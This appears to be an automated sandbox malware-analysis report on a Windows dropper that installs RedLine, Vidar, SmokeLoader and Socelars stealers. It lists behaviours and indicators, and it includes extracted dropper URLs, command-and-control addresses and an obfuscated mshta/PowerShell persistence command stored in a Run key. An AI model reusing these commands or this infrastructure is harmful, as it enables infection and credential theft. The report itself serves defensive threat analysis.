redline | 6f6585d3df024c6e411a075d856c79cc7a70e5509006e53dcaafeb8fc418fdf8

Analysis

max time kernel
151s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
10-03-2022 01:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6f6585d3df024c6e411a075d856c79cc7a70e5509006e53dcaafeb8fc418fdf8.exe
Size

3.2MB
MD5

ebf60ae71e4830f9e07d78e9abf7d764
SHA1

9a38784e3b37b2c8f045691378e5c73bd14ec653
SHA256

6f6585d3df024c6e411a075d856c79cc7a70e5509006e53dcaafeb8fc418fdf8
SHA512

46dcd680212a4a2426baa6e65d5fa2fdc2689fdc43d2eb9ffce274a8134dcde7f90383aca6528b47e4fc078b438d132eb136a171295f518a4fd8c2947dacd0a1

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.192/-RED/RED.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.192/-RED/NAN.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.192/-RED/NON.oo

Extracted

Family

vidar

Version

39.6

Botnet

933

https://sslamlssa1.tumblr.com/

Attributes

profile_id
933

Extracted

Family

smokeloader

Version

2020

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

Travis

5.182.5.22:33809

Attributes

auth_value
6fa3251b9d70327e7d1e5851c226af23

Extracted

Family

redline

Botnet

jack

5.182.5.203:33873

Attributes

auth_value
6d03d90d7d897b871fe8bfcaec8c6ae0

Extracted

Family

socelars

https://sa-us-bucket.s3.us-east-2.amazonaws.com/asdhjk/

Extracted

Family

redline

Botnet

fdfsdf

86.107.197.196:63065

Attributes

auth_value
49c341b88f13528ba52befa3c6ca7ebb

Extracted

Family

vidar

Version

50.6

Botnet

937

https://mas.to/@s4msalo

https://koyu.space/@samsa2l

Attributes

profile_id
937

Extracted

Family

redline

Botnet

ruzki (check bio)

103.133.111.182:44839

Attributes

auth_value
767fa45398d3ac4a23de20d0480c2b03

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4468 112 rUNdlL32.eXe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4468	112	rUNdlL32.eXe

RedLine Payload 12 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2332-224-0x0000000000CE0000-0x0000000000F03000-memory.dmp	family_redline
behavioral2/memory/1380-249-0x00000000002F0000-0x0000000000511000-memory.dmp	family_redline
behavioral2/memory/1380-253-0x00000000002F0000-0x0000000000511000-memory.dmp	family_redline
behavioral2/memory/2332-248-0x0000000000CE0000-0x0000000000F03000-memory.dmp	family_redline
behavioral2/memory/1380-245-0x00000000002F0000-0x0000000000511000-memory.dmp	family_redline
behavioral2/memory/2332-244-0x0000000000CE0000-0x0000000000F03000-memory.dmp	family_redline
behavioral2/memory/2332-243-0x0000000000CE0000-0x0000000000F03000-memory.dmp	family_redline
behavioral2/memory/4144-239-0x0000000000730000-0x0000000000750000-memory.dmp	family_redline
C:\Users\Admin\Documents\P4FjToOed9vkSKb02SfrskvH.exe	family_redline
C:\Users\Admin\Documents\P4FjToOed9vkSKb02SfrskvH.exe	family_redline
behavioral2/memory/4080-290-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/1380-228-0x00000000002F0000-0x0000000000511000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Documents\3iJ7eDr9Dz2kS9Sjq969lBsr.exe	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Vidar Stealer 4 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/3276-194-0x0000000000400000-0x00000000008F2000-memory.dmp	family_vidar
behavioral2/memory/3276-193-0x0000000000B20000-0x0000000000BBD000-memory.dmp	family_vidar
behavioral2/memory/2392-280-0x0000000004BD0000-0x0000000004C7C000-memory.dmp	family_vidar
behavioral2/memory/2392-283-0x0000000000400000-0x0000000002EEE000-memory.dmp	family_vidar

ASPack v2.12-2.42 9 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS0FA42D6D\setup_install.exe	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0FA42D6D\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0FA42D6D\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0FA42D6D\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0FA42D6D\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0FA42D6D\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0FA42D6D\setup_install.exe	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0FA42D6D\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0FA42D6D\libstdc++-6.dll	aspack_v212_v242

Blocklisted process makes network request 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

220 1068 powershell.exe
221 2644 powershell.exe
222 1416 powershell.exe
231 1416 powershell.exe
222 1416 powershell.exe
Downloads MZ/PE file

flow	pid	process
220	1068	powershell.exe
221	2644	powershell.exe
222	1416	powershell.exe
231	1416	powershell.exe
222	1416	powershell.exe

Executes dropped EXE 35 IoCs

Processes:

setup_install.exesahiba_8.exesahiba_3.exesahiba_2.exesahiba_6.exesahiba_4.exesahiba_5.exesahiba_1.exesahiba_7.exesahiba_1.exejfiag3g_gg.exejfiag3g_gg.exeom8iqdKXNWVtdXRfdBnVPTF1.exeyvVb3OnDifw1pTFJGElhSqnP.exeMCQ3QgtRhIufYCfJaIyqxY4C.exefgonyScoboSFjO8z3rcj_JDG.exe0ZUsRGyIunM4BUOMObxAb2Ab.exefc5_kN9xDQPwjhBX2SG_jB7p.exeJ4qbPI8msN1WdR4e4WRAMl8c.exeQNx2au99jZOzxxcSOLSNb51Q.exeP4FjToOed9vkSKb02SfrskvH.exet4wXirUdDfc0NMCST630Ti36.exeMiFMEHU75a3HaqwZQDbw0EzA.exeWerFault.exeUUCzQYLXZfVc0_W9PhszKON0.exe3iJ7eDr9Dz2kS9Sjq969lBsr.exekyqLHDjSldvVtuYQLHsul8B1.exeHgFEqI8Q4GeLOhnHvzmvLrT1.exefb4Rr_C87lDEH0cSQMgyCqct.exeInstall.exeyvVb3OnDifw1pTFJGElhSqnP.exeInstall.exeAccostarmi.exe.pifAccostarmi.exe.pifAccostarmi.exe.pif

pid	process
4484	setup_install.exe
4336	sahiba_8.exe
3276	sahiba_3.exe
4832	sahiba_2.exe
4840	sahiba_6.exe
4880	sahiba_4.exe
4876	sahiba_5.exe
3016	sahiba_1.exe
3332	sahiba_7.exe
2328	sahiba_1.exe
2272	jfiag3g_gg.exe
720	jfiag3g_gg.exe
4804	om8iqdKXNWVtdXRfdBnVPTF1.exe
1220	yvVb3OnDifw1pTFJGElhSqnP.exe
2016	MCQ3QgtRhIufYCfJaIyqxY4C.exe
2332	fgonyScoboSFjO8z3rcj_JDG.exe
1380	0ZUsRGyIunM4BUOMObxAb2Ab.exe
4488	fc5_kN9xDQPwjhBX2SG_jB7p.exe
2224	J4qbPI8msN1WdR4e4WRAMl8c.exe
2392	QNx2au99jZOzxxcSOLSNb51Q.exe
4144	P4FjToOed9vkSKb02SfrskvH.exe
3248	t4wXirUdDfc0NMCST630Ti36.exe
2092	MiFMEHU75a3HaqwZQDbw0EzA.exe
4360	WerFault.exe
4988	UUCzQYLXZfVc0_W9PhszKON0.exe
4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
3376	kyqLHDjSldvVtuYQLHsul8B1.exe
4252	HgFEqI8Q4GeLOhnHvzmvLrT1.exe
2140	fb4Rr_C87lDEH0cSQMgyCqct.exe
3700	Install.exe
4080	yvVb3OnDifw1pTFJGElhSqnP.exe
3644	Install.exe
3144	Accostarmi.exe.pif
2900	Accostarmi.exe.pif
4536	Accostarmi.exe.pif

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\Documents\MCQ3QgtRhIufYCfJaIyqxY4C.exe	upx
C:\Users\Admin\Documents\MCQ3QgtRhIufYCfJaIyqxY4C.exe	upx
C:\Users\Admin\Documents\MiFMEHU75a3HaqwZQDbw0EzA.exe	upx
C:\Users\Admin\Documents\MiFMEHU75a3HaqwZQDbw0EzA.exe	upx

Checks BIOS information in registry 2 TTPs 3 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

MCQ3QgtRhIufYCfJaIyqxY4C.exeQNx2au99jZOzxxcSOLSNb51Q.exeHgFEqI8Q4GeLOhnHvzmvLrT1.exeInstall.exe6f6585d3df024c6e411a075d856c79cc7a70e5509006e53dcaafeb8fc418fdf8.exesahiba_1.exesahiba_6.exeom8iqdKXNWVtdXRfdBnVPTF1.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	MCQ3QgtRhIufYCfJaIyqxY4C.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	QNx2au99jZOzxxcSOLSNb51Q.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	HgFEqI8Q4GeLOhnHvzmvLrT1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	6f6585d3df024c6e411a075d856c79cc7a70e5509006e53dcaafeb8fc418fdf8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	sahiba_1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	sahiba_6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	om8iqdKXNWVtdXRfdBnVPTF1.exe

Loads dropped DLL 17 IoCs

Processes:

setup_install.exesahiba_2.exerundll32.exeQNx2au99jZOzxxcSOLSNb51Q.exeAccostarmi.exe.pif

pid	process
4484	setup_install.exe
4484	setup_install.exe
4484	setup_install.exe
4484	setup_install.exe
4484	setup_install.exe
4484	setup_install.exe
4832	sahiba_2.exe
4444	rundll32.exe
2392	QNx2au99jZOzxxcSOLSNb51Q.exe
2392	QNx2au99jZOzxxcSOLSNb51Q.exe
3144	Accostarmi.exe.pif
3144	Accostarmi.exe.pif
3144	Accostarmi.exe.pif
3144	Accostarmi.exe.pif
3144	Accostarmi.exe.pif
3144	Accostarmi.exe.pif
3144	Accostarmi.exe.pif

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 4 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/4360-259-0x00007FF6854F0000-0x00007FF685A9E000-memory.dmp	themida
behavioral2/memory/4360-264-0x00007FF6854F0000-0x00007FF685A9E000-memory.dmp	themida
C:\Users\Admin\Documents\JC0tW1faoERPvjcN8G7oDaJ4.exe	themida
C:\Users\Admin\Documents\JC0tW1faoERPvjcN8G7oDaJ4.exe	themida

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

sahiba_7.exepowershell.exefb4Rr_C87lDEH0cSQMgyCqct.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	sahiba_7.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FaxOptions = "mshta vbscript:(CreateObject(\"WS\"+\"C\"+\"rI\"+\"Pt.ShEll\")).Run(\"powershell [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\\Microsoft\\Fax').GetValue('Drivers')).EntryPoint.Invoke(0,@())\",0)(window.close)"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Eyxrppteq = "\"C:\\Users\\Admin\\AppData\\Roaming\\Mzpexsf\\Eyxrppteq.exe\""	fb4Rr_C87lDEH0cSQMgyCqct.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

11 ip-api.com
230 ipinfo.io
8 ipinfo.io
9 ipinfo.io
Drops file in System32 directory 1 IoCs

Processes:

Install.exe

description ioc process

File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

0ZUsRGyIunM4BUOMObxAb2Ab.exefgonyScoboSFjO8z3rcj_JDG.exe

pid process

1380 0ZUsRGyIunM4BUOMObxAb2Ab.exe
2332 fgonyScoboSFjO8z3rcj_JDG.exe

flow	ioc
11	ip-api.com
230	ipinfo.io
8	ipinfo.io
9	ipinfo.io

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

pid	process
1380	0ZUsRGyIunM4BUOMObxAb2Ab.exe
2332	fgonyScoboSFjO8z3rcj_JDG.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

yvVb3OnDifw1pTFJGElhSqnP.exepowershell.exepowershell.exefb4Rr_C87lDEH0cSQMgyCqct.exeAccostarmi.exe.pif

description	pid	process	target process
PID 1220 set thread context of 4080	1220	yvVb3OnDifw1pTFJGElhSqnP.exe	yvVb3OnDifw1pTFJGElhSqnP.exe
PID 1068 set thread context of 3680	1068	powershell.exe	RegSvcs.exe
PID 2644 set thread context of 4276	2644	powershell.exe	RegSvcs.exe
PID 2140 set thread context of 3896	2140	fb4Rr_C87lDEH0cSQMgyCqct.exe	MSBuild.exe
PID 3144 set thread context of 4536	3144	Accostarmi.exe.pif	Accostarmi.exe.pif

Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job	schtasks.exe

Program crash 16 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
5060	4444	WerFault.exe	rundll32.exe
2136	3276	WerFault.exe	sahiba_3.exe
3276	4488	WerFault.exe	fc5_kN9xDQPwjhBX2SG_jB7p.exe
4332	3376	WerFault.exe	kyqLHDjSldvVtuYQLHsul8B1.exe
3604	3248	WerFault.exe	t4wXirUdDfc0NMCST630Ti36.exe
1788	2224	WerFault.exe	J4qbPI8msN1WdR4e4WRAMl8c.exe
5016	4488	WerFault.exe	fc5_kN9xDQPwjhBX2SG_jB7p.exe
4956	3248	WerFault.exe	t4wXirUdDfc0NMCST630Ti36.exe
2736	3376	WerFault.exe	kyqLHDjSldvVtuYQLHsul8B1.exe
3972	4252	WerFault.exe	HgFEqI8Q4GeLOhnHvzmvLrT1.exe
2872	2224	WerFault.exe	J4qbPI8msN1WdR4e4WRAMl8c.exe
4060	4252	WerFault.exe	HgFEqI8Q4GeLOhnHvzmvLrT1.exe
3420	4252	WerFault.exe	HgFEqI8Q4GeLOhnHvzmvLrT1.exe
3732	4252	WerFault.exe	HgFEqI8Q4GeLOhnHvzmvLrT1.exe
920	4252	WerFault.exe	HgFEqI8Q4GeLOhnHvzmvLrT1.exe
4360	4276	WerFault.exe	RegSvcs.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

sahiba_2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sahiba_2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sahiba_2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	sahiba_2.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

QNx2au99jZOzxxcSOLSNb51Q.exepowershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	QNx2au99jZOzxxcSOLSNb51Q.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	QNx2au99jZOzxxcSOLSNb51Q.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	powershell.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1424 schtasks.exe
1608 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4884 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

3844 tasklist.exe
4384 tasklist.exe

pid	process
1424	schtasks.exe
1608	schtasks.exe

pid	process
4884	timeout.exe

pid	process
3844	tasklist.exe
4384	tasklist.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

3656 taskkill.exe
2736 taskkill.exe
3492 taskkill.exe

pid	process
3656	taskkill.exe
2736	taskkill.exe
3492	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

sahiba_3.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	sahiba_3.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	sahiba_3.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

sahiba_2.exejfiag3g_gg.exe

pid	process
4832	sahiba_2.exe
4832	sahiba_2.exe
720	jfiag3g_gg.exe
720	jfiag3g_gg.exe
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2060
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

sahiba_2.exe

pid process

4832 sahiba_2.exe

pid	process
2060

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

sahiba_4.exesahiba_8.exesahiba_5.exe3iJ7eDr9Dz2kS9Sjq969lBsr.exeWerFault.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4880	sahiba_4.exe
Token: SeDebugPrivilege	4336	sahiba_8.exe
Token: SeDebugPrivilege	4876	sahiba_5.exe
Token: SeShutdownPrivilege	2060
Token: SeCreatePagefilePrivilege	2060
Token: SeShutdownPrivilege	2060
Token: SeCreatePagefilePrivilege	2060
Token: SeShutdownPrivilege	2060
Token: SeCreatePagefilePrivilege	2060
Token: SeShutdownPrivilege	2060
Token: SeCreatePagefilePrivilege	2060
Token: SeCreateTokenPrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeAssignPrimaryTokenPrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeLockMemoryPrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeIncreaseQuotaPrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeMachineAccountPrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeTcbPrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeSecurityPrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeTakeOwnershipPrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeLoadDriverPrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeSystemProfilePrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeSystemtimePrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeProfSingleProcessPrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeIncBasePriorityPrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeCreatePagefilePrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeCreatePermanentPrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeBackupPrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeRestorePrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeShutdownPrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeDebugPrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeAuditPrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeSystemEnvironmentPrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeChangeNotifyPrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeRemoteShutdownPrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeUndockPrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeSyncAgentPrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeEnableDelegationPrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeManageVolumePrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeImpersonatePrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeCreateGlobalPrivilege	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: 31	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: 32	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: 33	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: 34	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: 35	4476	3iJ7eDr9Dz2kS9Sjq969lBsr.exe
Token: SeDebugPrivilege	4360	WerFault.exe
Token: SeShutdownPrivilege	2060
Token: SeCreatePagefilePrivilege	2060
Token: SeShutdownPrivilege	2060
Token: SeCreatePagefilePrivilege	2060
Token: SeShutdownPrivilege	2060
Token: SeCreatePagefilePrivilege	2060
Token: SeDebugPrivilege	1416	powershell.exe
Token: SeDebugPrivilege	2644	powershell.exe
Token: SeDebugPrivilege	1068	powershell.exe
Token: SeShutdownPrivilege	2060
